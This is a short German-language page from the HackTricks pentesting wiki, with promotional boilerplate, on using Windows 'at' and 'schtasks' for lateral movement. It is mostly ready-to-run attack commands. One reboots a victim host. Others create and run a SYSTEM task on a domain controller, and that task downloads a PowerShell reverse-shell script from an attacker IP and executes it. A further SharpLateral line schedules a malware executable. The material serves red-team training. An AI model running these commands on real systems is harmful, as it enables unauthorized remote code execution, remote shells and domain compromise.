AtExec / SchtasksExec

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wie funktioniert es?

At ermöglicht das Planen von Aufgaben auf Hosts, bei denen Sie den Benutzernamen/(Passwort/Hash) kennen. Sie können es also verwenden, um Befehle auf anderen Hosts auszuführen und die Ausgabe zu erhalten.

At \\victim 11:00:00PM shutdown -r

Mit schtasks müssen Sie zuerst die Aufgabe erstellen und dann aufrufen:

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Sie können auch SharpLateral verwenden:

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

Weitere Informationen zur Verwendung von schtasks mit Silver Tickets finden Sie hier.

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated